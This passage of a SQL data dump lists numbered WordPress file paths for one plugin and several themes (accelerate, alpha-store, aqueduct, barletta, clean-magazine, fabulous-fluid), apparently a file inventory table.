-content/plugins/wp-date-remover/index.php'),(2979,'wp-content/plugins/wp-date-remover/public/class-wp-date-remover-public.php'),(2980,'wp-content/plugins/wp-date-remover/public/index.php'),(2981,'wp-content/plugins/wp-date-remover/public/js/wp-date-remover-public.js'),(2982,'wp-content/plugins/wp-date-remover/public/partials/wp-date-remover-public-display.php'),(2983,'wp-content/plugins/wp-date-remover/uninstall.php'),(2984,'wp-content/plugins/wp-date-remover/wp-date-remover.php'),(2985,'wp-content/themes/accelerate/404.php'),(2986,'wp-content/themes/accelerate/archive.php'),(2987,'wp-content/themes/accelerate/comments.php'),(2988,'wp-content/themes/accelerate/content-blog-large-image.php'),(2989,'wp-content/themes/accelerate/content-blog-small-image.php'),(2990,'wp-content/themes/accelerate/content-page.php'),(2991,'wp-content/themes/accelerate/content-single.php'),(2992,'wp-content/themes/accelerate/content.php'),(2993,'wp-content/themes/accelerate/css/admin/message.css'),(2994,'wp-content/themes/accelerate/css/admin/welcome.css'),(2995,'wp-content/themes/accelerate/fontawesome/css/font-awesome.css'),(2996,'wp-content/themes/accelerate/fontawesome/css/font-awesome.min.css'),(2997,'wp-content/themes/accelerate/fontawesome/fonts/FontAwesome.otf'),(2998,'wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.eot'),(2999,'wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.svg'),(3000,'wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.ttf'),(3001,'wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.woff'),(3002,'wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.woff2'),(3003,'wp-content/themes/accelerate/footer.php'),(3004,'wp-content/themes/accelerate/functions.php'),(3005,'wp-content/themes/accelerate/header.php'),(3006,'wp-content/themes/accelerate/home.php'),(3007,'wp-content/themes/accelerate/inc/admin/class-accelerate-admin.php'),(3008,'wp-content/themes/accelerate/inc/admin/images/left-sidebar.png'),(3009,'wp-content/themes/accelerate/inc/admin/images/no-sidebar-content-centered-layout.png'),(3010,'wp-content/themes/accelerate/inc/admin/images/no-sidebar-full-width-layout.png'),(3011,'wp-content/themes/accelerate/inc/admin/images/right-sidebar.png'),(3012,'wp-content/themes/accelerate/inc/admin/meta-boxes.php'),(3013,'wp-content/themes/accelerate/inc/custom-header.php'),(3014,'wp-content/themes/accelerate/inc/customizer.php'),(3015,'wp-content/themes/accelerate/inc/functions.php'),(3016,'wp-content/themes/accelerate/inc/header-functions.php'),(3017,'wp-content/themes/accelerate/inc/post-formats.php'),(3018,'wp-content/themes/accelerate/inc/widgets/widgets.php'),(3019,'wp-content/themes/accelerate/index.php'),(3020,'wp-content/themes/accelerate/js/accelerate-custom.js'),(3021,'wp-content/themes/accelerate/js/accelerate-slider-setting.js'),(3022,'wp-content/themes/accelerate/js/html5shiv.js'),(3023,'wp-content/themes/accelerate/js/html5shiv.min.js'),(3024,'wp-content/themes/accelerate/js/jquery.cycle.all.js'),(3025,'wp-content/themes/accelerate/js/jquery.cycle.all.min.js'),(3026,'wp-content/themes/accelerate/js/navigation.js'),(3027,'wp-content/themes/accelerate/languages/accelerate.pot'),(3028,'wp-content/themes/accelerate/languages/hu_HU.mo'),(3029,'wp-content/themes/accelerate/languages/hu_HU.po'),(3030,'wp-content/themes/accelerate/languages/pl_PL.mo'),(3031,'wp-content/themes/accelerate/languages/pl_PL.po'),(3032,'wp-content/themes/accelerate/navigation.php'),(3033,'wp-content/themes/accelerate/no-results.php'),(3034,'wp-content/themes/accelerate/page-templates/business.php'),(3035,'wp-content/themes/accelerate/page-templates/contact.php'),(3036,'wp-content/themes/accelerate/page.php'),(3037,'wp-content/themes/accelerate/readme.txt'),(3038,'wp-content/themes/accelerate/rtl.css'),(3039,'wp-content/themes/accelerate/screenshot.jpg'),(3040,'wp-content/themes/accelerate/search.php'),(3041,'wp-content/themes/accelerate/searchform.php'),(3042,'wp-content/themes/accelerate/sidebar-footer.php'),(3043,'wp-content/themes/accelerate/sidebar-left.php'),(3044,'wp-content/themes/accelerate/sidebar.php'),(3045,'wp-content/themes/accelerate/single.php'),(3046,'wp-content/themes/accelerate/style.css'),(3047,'wp-content/themes/alpha-store/404.php'),(3048,'wp-content/themes/alpha-store/archive.php'),(3049,'wp-content/themes/alpha-store/comments.php'),(3050,'wp-content/themes/alpha-store/content-page.php'),(3051,'wp-content/themes/alpha-store/content-single.php'),(3052,'wp-content/themes/alpha-store/content.php'),(3053,'wp-content/themes/alpha-store/css/bootstrap.css'),(3054,'wp-content/themes/alpha-store/css/flexslider.css'),(3055,'wp-content/themes/alpha-store/css/font-awesome.css'),(3056,'wp-content/themes/alpha-store/css/font-awesome.min.css'),(3057,'wp-content/themes/alpha-store/css/theme-info.css'),(3058,'wp-content/themes/alpha-store/fonts/FontAwesome.otf'),(3059,'wp-content/themes/alpha-store/fonts/fontawesome-webfont.eot'),(3060,'wp-content/themes/alpha-store/fonts/fontawesome-webfont.svg'),(3061,'wp-content/themes/alpha-store/fonts/fontawesome-webfont.ttf'),(3062,'wp-content/themes/alpha-store/fonts/fontawesome-webfont.woff'),(3063,'wp-content/themes/alpha-store/fonts/fontawesome-webfont.woff2'),(3064,'wp-content/themes/alpha-store/footer.php'),(3065,'wp-content/themes/alpha-store/front-page.php'),(3066,'wp-content/themes/alpha-store/functions.php'),(3067,'wp-content/themes/alpha-store/header.php'),(3068,'wp-content/themes/alpha-store/img/carousel-img.png'),(3069,'wp-content/themes/alpha-store/img/loader-carousel.gif'),(3070,'wp-content/themes/alpha-store/img/loading.gif'),(3071,'wp-content/themes/alpha-store/img/noprew-related.jpg'),(3072,'wp-content/themes/alpha-store/img/pattern.png'),(3073,'wp-content/themes/alpha-store/img/site-logo.png'),(3074,'wp-content/themes/alpha-store/index.php'),(3075,'wp-content/themes/alpha-store/js/bootstrap.js'),(3076,'wp-content/themes/alpha-store/js/bootstrap.min.js'),(3077,'wp-content/themes/alpha-store/js/customscript.js'),(3078,'wp-content/themes/alpha-store/js/jquery.flexslider-min.js'),(3079,'wp-content/themes/alpha-store/js/jquery.flexslider.js'),(3080,'wp-content/themes/alpha-store/languages/alpha-store.pot'),(3081,'wp-content/themes/alpha-store/languages/cs_CZ.mo'),(3082,'wp-content/themes/alpha-store/languages/cs_CZ.po'),(3083,'wp-content/themes/alpha-store/lib/class-tgm-plugin-activation.php'),(3084,'wp-content/themes/alpha-store/lib/cmb_extension/cmb-field-select2.php'),(3085,'wp-content/themes/alpha-store/lib/cmb_extension/css/select2.css'),(3086,'wp-content/themes/alpha-store/lib/cmb_extension/css/select2.min.css'),(3087,'wp-content/themes/alpha-store/lib/cmb_extension/css/style.css'),(3088,'wp-content/themes/alpha-store/lib/cmb_extension/js/script.js'),(3089,'wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.css'),(3090,'wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.js'),(3091,'wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.min.js'),(3092,'wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.png'),(3093,'wp-content/themes/alpha-store/lib/cmb_extension/js/select2-init.js'),(3094,'wp-content/themes/alpha-store/lib/cmb_extension/js/select2.min.js'),(3095,'wp-content/themes/alpha-store/lib/customize-pro/class-customize.php'),(3096,'wp-content/themes/alpha-store/lib/customize-pro/customize-controls.css'),(3097,'wp-content/themes/alpha-store/lib/customize-pro/customize-controls.js'),(3098,'wp-content/themes/alpha-store/lib/customize-pro/section-pro.php'),(3099,'wp-content/themes/alpha-store/lib/include-kirki.php'),(3100,'wp-content/themes/alpha-store/lib/metaboxes.php'),(3101,'wp-content/themes/alpha-store/lib/plugin-activation.php'),(3102,'wp-content/themes/alpha-store/lib/theme-config.php'),(3103,'wp-content/themes/alpha-store/lib/welcome/css/welcome.css'),(3104,'wp-content/themes/alpha-store/lib/welcome/img/alpha-store-front-page.jpg'),(3105,'wp-content/themes/alpha-store/lib/welcome/img/alpha-store.jpg'),(3106,'wp-content/themes/alpha-store/lib/welcome/img/giga-store.jpg'),(3107,'wp-content/themes/alpha-store/lib/welcome/img/kakina.jpg'),(3108,'wp-content/themes/alpha-store/lib/welcome/img/maxstore.jpg'),(3109,'wp-content/themes/alpha-store/lib/welcome/js/welcome.js'),(3110,'wp-content/themes/alpha-store/lib/welcome/sections/actions-required.php'),(3111,'wp-content/themes/alpha-store/lib/welcome/sections/contribute.php'),(3112,'wp-content/themes/alpha-store/lib/welcome/sections/free_pro.php'),(3113,'wp-content/themes/alpha-store/lib/welcome/sections/getting-started.php'),(3114,'wp-content/themes/alpha-store/lib/welcome/sections/support.php'),(3115,'wp-content/themes/alpha-store/lib/welcome/sections/woo-themes.php'),(3116,'wp-content/themes/alpha-store/lib/welcome/welcome-screen.php'),(3117,'wp-content/themes/alpha-store/lib/wp_bootstrap_navwalker.php'),(3118,'wp-content/themes/alpha-store/page.php'),(3119,'wp-content/themes/alpha-store/readme.txt'),(3120,'wp-content/themes/alpha-store/screenshot.png'),(3121,'wp-content/themes/alpha-store/sidebar-home-right.php'),(3122,'wp-content/themes/alpha-store/sidebar-home.php'),(3123,'wp-content/themes/alpha-store/sidebar-left.php'),(3124,'wp-content/themes/alpha-store/sidebar-right.php'),(3125,'wp-content/themes/alpha-store/single.php'),(3126,'wp-content/themes/alpha-store/style.css'),(3127,'wp-content/themes/alpha-store/template-home-sidebar.php'),(3128,'wp-content/themes/alpha-store/template-parts/demo-layout-one.php'),(3129,'wp-content/themes/alpha-store/template-parts/demo-layout-two.php'),(3130,'wp-content/themes/alpha-store/template-parts/template-part-head.php'),(3131,'wp-content/themes/alpha-store/template-parts/template-part-home-cats.php'),(3132,'wp-content/themes/alpha-store/template-parts/template-part-postauthor.php'),(3133,'wp-content/themes/alpha-store/template-parts/template-part-postmeta.php'),(3134,'wp-content/themes/alpha-store/template-parts/template-part-posttags.php'),(3135,'wp-content/themes/alpha-store/template-parts/template-part-related.php'),(3136,'wp-content/themes/alpha-store/template-parts/template-part-searchbar.php'),(3137,'wp-content/themes/alpha-store/woocommerce.php'),(3138,'wp-content/themes/aqueduct/404.php'),(3139,'wp-content/themes/aqueduct/README.md'),(3140,'wp-content/themes/aqueduct/archive.php'),(3141,'wp-content/themes/aqueduct/blog.php'),(3142,'wp-content/themes/aqueduct/blogpage.php'),(3143,'wp-content/themes/aqueduct/comments.php'),(3144,'wp-content/themes/aqueduct/content-none.php'),(3145,'wp-content/themes/aqueduct/content-page.php'),(3146,'wp-content/themes/aqueduct/content-single.php'),(3147,'wp-content/themes/aqueduct/content.php'),(3148,'wp-content/themes/aqueduct/css/dragfunpanel.css'),(3149,'wp-content/themes/aqueduct/css/font-awesome.css'),(3150,'wp-content/themes/aqueduct/css/font-awesome.min.css'),(3151,'wp-content/themes/aqueduct/fonts/FontAwesome.otf'),(3152,'wp-content/themes/aqueduct/fonts/fontawesome-webfont.eot'),(3153,'wp-content/themes/aqueduct/fonts/fontawesome-webfont.svg'),(3154,'wp-content/themes/aqueduct/fonts/fontawesome-webfont.ttf'),(3155,'wp-content/themes/aqueduct/fonts/fontawesome-webfont.woff'),(3156,'wp-content/themes/aqueduct/fonts/fontawesome-webfont.woff2'),(3157,'wp-content/themes/aqueduct/footer.php'),(3158,'wp-content/themes/aqueduct/fullwidth.php'),(3159,'wp-content/themes/aqueduct/functions.php'),(3160,'wp-content/themes/aqueduct/header.php'),(3161,'wp-content/themes/aqueduct/img/carousel-thumbnail.jpg'),(3162,'wp-content/themes/aqueduct/img/centered.jpg'),(3163,'wp-content/themes/aqueduct/img/default.jpg'),(3164,'wp-content/themes/aqueduct/img/featuredimg.jpg'),(3165,'wp-content/themes/aqueduct/img/featuredimgsmall.jpg'),(3166,'wp-content/themes/aqueduct/img/giridpostbig.jpg'),(3167,'wp-content/themes/aqueduct/img/gridposts.jpg'),(3168,'wp-content/themes/aqueduct/img/gridpostsmall.jpg'),(3169,'wp-content/themes/aqueduct/img/nobraking.jpg'),(3170,'wp-content/themes/aqueduct/img/simplethumbnail.jpg'),(3171,'wp-content/themes/aqueduct/img/slider-thumbnail.jpg'),(3172,'wp-content/themes/aqueduct/img/thumbnail.jpg'),(3173,'wp-content/themes/aqueduct/inc/dragfun/dragtheme-css.php'),(3174,'wp-content/themes/aqueduct/inc/dragfun/dragthemesfunction.php'),(3175,'wp-content/themes/aqueduct/inc/template-tags.php'),(3176,'wp-content/themes/aqueduct/index.php'),(3177,'wp-content/themes/aqueduct/js/customizer.js'),(3178,'wp-content/themes/aqueduct/js/dragjs.js'),(3179,'wp-content/themes/aqueduct/languages/aqueduct.pot'),(3180,'wp-content/themes/aqueduct/languages/readme.txt'),(3181,'wp-content/themes/aqueduct/license.txt'),(3182,'wp-content/themes/aqueduct/magazine.php'),(3183,'wp-content/themes/aqueduct/page.php'),(3184,'wp-content/themes/aqueduct/screenshot.png'),(3185,'wp-content/themes/aqueduct/search.php'),(3186,'wp-content/themes/aqueduct/sidebar.php'),(3187,'wp-content/themes/aqueduct/single.php'),(3188,'wp-content/themes/aqueduct/style.css'),(3189,'wp-content/themes/barletta/404.php'),(3190,'wp-content/themes/barletta/archive.php'),(3191,'wp-content/themes/barletta/comments.php'),(3192,'wp-content/themes/barletta/content-page.php'),(3193,'wp-content/themes/barletta/content-single.php'),(3194,'wp-content/themes/barletta/content.php'),(3195,'wp-content/themes/barletta/css/bootstrap.min.css'),(3196,'wp-content/themes/barletta/css/dev/bootstrap.css'),(3197,'wp-content/themes/barletta/css/dev/font-awesome.css'),(3198,'wp-content/themes/barletta/css/font-awesome.min.css'),(3199,'wp-content/themes/barletta/css/images/bx_loader.gif'),(3200,'wp-content/themes/barletta/fonts/FontAwesome.otf'),(3201,'wp-content/themes/barletta/fonts/fontawesome-webfont.eot'),(3202,'wp-content/themes/barletta/fonts/fontawesome-webfont.svg'),(3203,'wp-content/themes/barletta/fonts/fontawesome-webfont.ttf'),(3204,'wp-content/themes/barletta/fonts/fontawesome-webfont.woff'),(3205,'wp-content/themes/barletta/fonts/fontawesome-webfont.woff2'),(3206,'wp-content/themes/barletta/fonts/glyphicons-halflings-regular.eot'),(3207,'wp-content/themes/barletta/fonts/glyphicons-halflings-regular.svg'),(3208,'wp-content/themes/barletta/fonts/glyphicons-halflings-regular.ttf'),(3209,'wp-content/themes/barletta/fonts/glyphicons-halflings-regular.woff'),(3210,'wp-content/themes/barletta/fonts/glyphicons-halflings-regular.woff2'),(3211,'wp-content/themes/barletta/footer.php'),(3212,'wp-content/themes/barletta/functions.php'),(3213,'wp-content/themes/barletta/header.php'),(3214,'wp-content/themes/barletta/inc/customizer.php'),(3215,'wp-content/themes/barletta/inc/extras.php'),(3216,'wp-content/themes/barletta/inc/template_tags.php'),(3217,'wp-content/themes/barletta/inc/widgets/widget-barletta-about.php'),(3218,'wp-content/themes/barletta/inc/widgets/widget-barletta-posts.php'),(3219,'wp-content/themes/barletta/inc/widgets/widget-barletta-social.php'),(3220,'wp-content/themes/barletta/inc/wp_bootstrap_navwalker.php'),(3221,'wp-content/themes/barletta/index.php'),(3222,'wp-content/themes/barletta/js/barletta.scripts.js'),(3223,'wp-content/themes/barletta/js/bootstrap.min.js'),(3224,'wp-content/themes/barletta/js/dev/bootstrap.js'),(3225,'wp-content/themes/barletta/js/dev/jquery.bxslider.js'),(3226,'wp-content/themes/barletta/js/jquery.bxslider.min.js'),(3227,'wp-content/themes/barletta/languages/barletta.pot'),(3228,'wp-content/themes/barletta/page-fullwidth.php'),(3229,'wp-content/themes/barletta/page.php'),(3230,'wp-content/themes/barletta/readme.txt'),(3231,'wp-content/themes/barletta/screenshot.jpg'),(3232,'wp-content/themes/barletta/searchform.php'),(3233,'wp-content/themes/barletta/sidebar-footer.php'),(3234,'wp-content/themes/barletta/sidebar-fullwidth-footer.php'),(3235,'wp-content/themes/barletta/sidebar.php'),(3236,'wp-content/themes/barletta/single.php'),(3237,'wp-content/themes/barletta/style.css'),(3238,'wp-content/themes/clean-magazine/404.php'),(3239,'wp-content/themes/clean-magazine/archive.php'),(3240,'wp-content/themes/clean-magazine/changelog.txt'),(3241,'wp-content/themes/clean-magazine/comments.php'),(3242,'wp-content/themes/clean-magazine/content-none.php'),(3243,'wp-content/themes/clean-magazine/content-page.php'),(3244,'wp-content/themes/clean-magazine/content-single.php'),(3245,'wp-content/themes/clean-magazine/content.php'),(3246,'wp-content/themes/clean-magazine/css/clean-magazine-customizer.css'),(3247,'wp-content/themes/clean-magazine/css/clean-magazine-metabox-tabs.css'),(3248,'wp-content/themes/clean-magazine/css/editor-style.css'),(3249,'wp-content/themes/clean-magazine/css/genericons/Genericons.eot'),(3250,'wp-content/themes/clean-magazine/css/genericons/Genericons.svg'),(3251,'wp-content/themes/clean-magazine/css/genericons/Genericons.ttf'),(3252,'wp-content/themes/clean-magazine/css/genericons/Genericons.woff'),(3253,'wp-content/themes/clean-magazine/css/genericons/genericons.css'),(3254,'wp-content/themes/clean-magazine/css/widgets.css'),(3255,'wp-content/themes/clean-magazine/footer.php'),(3256,'wp-content/themes/clean-magazine/functions.php'),(3257,'wp-content/themes/clean-magazine/header.php'),(3258,'wp-content/themes/clean-magazine/images/gallery/ads-125x125-demo.jpg'),(3259,'wp-content/themes/clean-magazine/images/gallery/ads-300x250.jpg'),(3260,'wp-content/themes/clean-magazine/images/gallery/ads-728x90.jpg'),(3261,'wp-content/themes/clean-magazine/images/gallery/ads-970x125.jpg'),(3262,'wp-content/themes/clean-magazine/images/gallery/ads2-300x250.jpg'),(3263,'wp-content/themes/clean-magazine/images/gallery/ads2-728x90.jpg'),(3264,'wp-content/themes/clean-magazine/images/gallery/featured-1920x800.jpg'),(3265,'wp-content/themes/clean-magazine/images/gallery/featured1-350x263.jpg'),(3266,'wp-content/themes/clean-magazine/images/gallery/featured1-480x320.jpg'),(3267,'wp-content/themes/clean-magazine/images/gallery/featured2-350x263.jpg'),(3268,'wp-content/themes/clean-magazine/images/gallery/featured2-480x320.jpg'),(3269,'wp-content/themes/clean-magazine/images/gallery/featured3-350x263.jpg'),(3270,'wp-content/themes/clean-magazine/images/gallery/featured3-480x320.jpg'),(3271,'wp-content/themes/clean-magazine/images/gallery/featured4-350x263.jpg'),(3272,'wp-content/themes/clean-magazine/images/gallery/featured4-480x320.jpg'),(3273,'wp-content/themes/clean-magazine/images/gallery/newsletter.jpg'),(3274,'wp-content/themes/clean-magazine/images/gallery/no-featured-image-1920x800.jpg'),(3275,'wp-content/themes/clean-magazine/images/gallery/slider1-1920x800.jpg'),(3276,'wp-content/themes/clean-magazine/images/gallery/slider2-1920x800.jpg'),(3277,'wp-content/themes/clean-magazine/images/headers/buddha.jpg'),(3278,'wp-content/themes/clean-magazine/images/headers/logo.png'),(3279,'wp-content/themes/clean-magazine/inc/clean-magazine-breadcrumb.php'),(3280,'wp-content/themes/clean-magazine/inc/clean-magazine-core.php'),(3281,'wp-content/themes/clean-magazine/inc/clean-magazine-custom-header.php'),(3282,'wp-content/themes/clean-magazine/inc/clean-magazine-default-options.php'),(3283,'wp-content/themes/clean-magazine/inc/clean-magazine-featured-content.php'),(3284,'wp-content/themes/clean-magazine/inc/clean-magazine-featured-slider.php'),(3285,'wp-content/themes/clean-magazine/inc/clean-magazine-header-highlight-content.php'),(3286,'wp-content/themes/clean-magazine/inc/clean-magazine-menus.php'),(3287,'wp-content/themes/clean-magazine/inc/clean-magazine-metabox.php'),(3288,'wp-content/themes/clean-magazine/inc/clean-magazine-news-ticker.php'),(3289,'wp-content/themes/clean-magazine/inc/clean-magazine-social-icons.php'),(3290,'wp-content/themes/clean-magazine/inc/clean-magazine-structure.php'),(3291,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-active-callbacks.php'),(3292,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-custom-controls.php'),(3293,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-featured-content.php'),(3294,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-featured-slider.php'),(3295,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-header-highlight-content.php'),(3296,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-header-options.php'),(3297,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-news-ticker.php'),(3298,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-sanitize-functions.php'),(3299,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-social-icons.php'),(3300,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-theme-options.php'),(3301,'wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer.php'),(3302,'wp-content/themes/clean-magazine/inc/widgets/advertisement-image.php'),(3303,'wp-content/themes/clean-magazine/inc/widgets/featured-posts.php'),(3304,'wp-content/themes/clean-magazine/inc/widgets/instagram.php'),(3305,'wp-content/themes/clean-magazine/inc/widgets/social-icons.php'),(3306,'wp-content/themes/clean-magazine/inc/widgets/widgets.php'),(3307,'wp-content/themes/clean-magazine/index.php'),(3308,'wp-content/themes/clean-magazine/js/clean-magazine-custom-scripts.min.js'),(3309,'wp-content/themes/clean-magazine/js/clean-magazine-customizer-custom-scripts.min.js'),(3310,'wp-content/themes/clean-magazine/js/clean-magazine-customizer.min.js'),(3311,'wp-content/themes/clean-magazine/js/clean-magazine-metabox.min.js'),(3312,'wp-content/themes/clean-magazine/js/clean-magazine-scrollup.min.js'),(3313,'wp-content/themes/clean-magazine/js/fitvids.min.js'),(3314,'wp-content/themes/clean-magazine/js/html5.min.js'),(3315,'wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.flip.min.js'),(3316,'wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.js.map'),(3317,'wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.min.js'),(3318,'wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.scrollVert.min.js'),(3319,'wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.shuffle.min.js'),(3320,'wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.tile.min.js'),(3321,'wp-content/themes/clean-magazine/js/jquery.sidr.min.js'),(3322,'wp-content/themes/clean-magazine/js/navigation.min.js'),(3323,'wp-content/themes/clean-magazine/js/skip-link-focus-fix.min.js'),(3324,'wp-content/themes/clean-magazine/js/source/clean-magazine-custom-scripts.js'),(3325,'wp-content/themes/clean-magazine/js/source/clean-magazine-customizer-custom-scripts.js'),(3326,'wp-content/themes/clean-magazine/js/source/clean-magazine-customizer.js'),(3327,'wp-content/themes/clean-magazine/js/source/clean-magazine-metabox.js'),(3328,'wp-content/themes/clean-magazine/js/source/clean-magazine-scrollup.js'),(3329,'wp-content/themes/clean-magazine/js/source/fitvids.js'),(3330,'wp-content/themes/clean-magazine/js/source/html5.js'),(3331,'wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.flip.js'),(3332,'wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.js'),(3333,'wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.scrollVert.js'),(3334,'wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.shuffle.js'),(3335,'wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.tile.js'),(3336,'wp-content/themes/clean-magazine/js/source/jquery.sidr.js'),(3337,'wp-content/themes/clean-magazine/js/source/navigation.js'),(3338,'wp-content/themes/clean-magazine/js/source/skip-link-focus-fix.js'),(3339,'wp-content/themes/clean-magazine/js/widgets.min.js'),(3340,'wp-content/themes/clean-magazine/languages/clean-magazine.pot'),(3341,'wp-content/themes/clean-magazine/languages/da_DK.mo'),(3342,'wp-content/themes/clean-magazine/languages/da_DK.po'),(3343,'wp-content/themes/clean-magazine/languages/de_DE.mo'),(3344,'wp-content/themes/clean-magazine/languages/de_DE.po'),(3345,'wp-content/themes/clean-magazine/languages/pt_BR.mo'),(3346,'wp-content/themes/clean-magazine/languages/pt_BR.po'),(3347,'wp-content/themes/clean-magazine/languages/sv_SE.mo'),(3348,'wp-content/themes/clean-magazine/languages/sv_SE.po'),(3349,'wp-content/themes/clean-magazine/no-results.php'),(3350,'wp-content/themes/clean-magazine/page.php'),(3351,'wp-content/themes/clean-magazine/readme.txt'),(3352,'wp-content/themes/clean-magazine/rtl.css'),(3353,'wp-content/themes/clean-magazine/screenshot.png'),(3354,'wp-content/themes/clean-magazine/search.php'),(3355,'wp-content/themes/clean-magazine/searchform.php'),(3356,'wp-content/themes/clean-magazine/sidebar-footer.php'),(3357,'wp-content/themes/clean-magazine/sidebar-header-right.php'),(3358,'wp-content/themes/clean-magazine/sidebar.php'),(3359,'wp-content/themes/clean-magazine/single.php'),(3360,'wp-content/themes/clean-magazine/style.css'),(3361,'wp-content/themes/fabulous-fluid/404.php'),(3362,'wp-content/themes/fabulous-fluid/archive.php'),(3363,'wp-content/themes/fabulous-fluid/changelog.txt'),(3364,'wp-content/themes/fabulous-fluid/comments.php'),(3365,'wp-content/themes/fabulous-fluid/css/customizer.css'),(3366,'wp-content/themes/fabulous-fluid/css/editor-style.css'),(3367,'wp-content/themes/fabulous-fluid/css/font-awesome.css'),(3368,'wp-content/themes/fabulous-fluid/css/jcf.css'),(3369,'wp-content/themes/fabulous-fluid/css/jquery.sidr.dark.css'),(3370,'wp-content/themes/fabulous-fluid/css/jquery.sidr.dark.min.css'),(3371,'wp-content/themes/fabulous-fluid/css/metabox-tabs.css'),(3372,'wp-content/themes/fabulous-fluid/fonts/FontAwesome.otf'),(3373,'wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.eot'),(3374,'wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.svg'),(3375,'wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.ttf'),(3376,'wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.woff'),(3377,'wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.woff2'),(3378,'wp-content/themes/fabulous-fluid/footer.php'),(3379,'wp-content/themes/fabulous-fluid/functions.php'),(3380,'wp-content/themes/fabulous-fluid/header.php'),(3381,'wp-content/themes/fabulous-fluid/images/arrow-down.png'),(3382,'wp-content/themes/fabulous-fluid/images/arrow-right-blue.png'),(3383,'wp-content/themes/fabulous-fluid/images/bg-quote.png'),(3384,'wp-content/themes/fabulous-fluid/images/btn-menu.png'),(3385,'wp-content/themes/fabulous-fluid/images/bullet.png'),(3386,'wp-content/themes/fabulous-fluid/images/checkbox-active.png'),(3387,'wp-content/themes/fabulous-fluid/images/checkbox.png'),(3388,'wp-content/themes/fabulous-fluid/images/featured-1.jpg'),(3389,'wp-content/themes/fabulous-fluid/images/featured-2.jpg'),(3390,'wp-content/themes/fabulous-fluid/images/featured-3.jpg'),(3391,'wp-content/themes/fabulous-fluid/images/featured-4.jpg'),(3392,'wp-content/themes/fabulous-fluid/images/featured-5.jpg'),(3393,'wp-content/themes/fabulous-fluid/images/featured-6.jpg'),(3394,'wp-content/themes/fabulous-fluid/images/grid-img1.jpg'),(3395,'wp-content/themes/fabulous-fluid/images/grid-img10.jpg'),(3396,'wp-content/themes/fabulous-fluid/images/grid-img11.jpg'),(3397,'wp-content/themes/fabulous-fluid/images/grid-img12.jpg'),(3398,'wp-content/themes/fabulous-fluid/images/grid-img2.jpg'),(3399,'wp-content/themes/fabulous-fluid/images/grid-img3.jpg'),(3400,'wp-content/themes/fabulous-fluid/images/grid-img4.jpg'),(3401,'wp-content/themes/fabulous-fluid/images/grid-img5.jpg'),(3402,'wp-content/themes/fabulous-fluid/images/grid-img6.jpg'),(3403,'wp-content/themes/fabulous-fluid/images/grid-img7.jpg'),(3404,'wp-content/themes/fabulous-fluid/images/grid-img8.jpg'),(3405,'wp-content/themes/fabulous-fluid/images/grid-img9.jpg'),(3406,'wp-content/themes/fabulous-fluid/images/icon-calander.png'),(3407,'wp-content/themes/fabulous-fluid/images/icon-calander2.png'),(3408,'wp-content/themes/fabulous-fluid/images/icon-category.png'),(3409,'wp-content/themes/fabulous-fluid/images/logo.png'),(3410,'wp-content/themes/fabulous-fluid/images/no-featured-image-1680x720.jpg'),(3411,'wp-content/themes/fabulous-fluid/images/no-featured-image-420x283.jpg'),(3412,'wp-content/themes/fabulous-fluid/images/no-featured-image-67x67.jpg'),(3413,'wp-content/themes/fabulous-fluid/images/no-featured-image-840x565.jpg'),(3414,'wp-content/themes/fabulous-fluid/images/slider-img1.jpg'),(3415,'wp-content/themes/fabulous-fluid/images/slider-img2.jpg'),(3416,'wp-content/themes/fabulous-fluid/images/slider-img3.jpg'),(3417,'wp-content/themes/fabulous-fluid/images/slider-img4.jpg'),(3418,'wp-content/themes/fabulous-fluid/images/slider-img5.jpg'),(3419,'wp-content/themes/fabulous-fluid/inc/breadcrumb.php'),(3420,'wp-content/themes/fabulous-fluid/inc/custom-header.php'),(3421,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-active-callbacks.php'),(3422,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-custom-controls.php'),(3423,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-featured-content-options.php'),(3424,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-featured-grid-content-options.php'),(3425,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-featured-slider-options.php'),(3426,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-header-options.php'),(3427,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-sanitize-functions.php'),(3428,'wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-theme-options.php'),(3429,'wp-content/themes/fabulous-